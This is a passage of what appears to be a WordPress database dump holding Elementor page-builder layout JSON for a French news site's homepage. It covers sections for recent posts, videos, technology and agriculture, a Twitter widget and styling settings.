"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2331,753,'_elementor_version','0.4'),(2334,754,'_elementor_edit_mode','builder'),(2335,754,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur 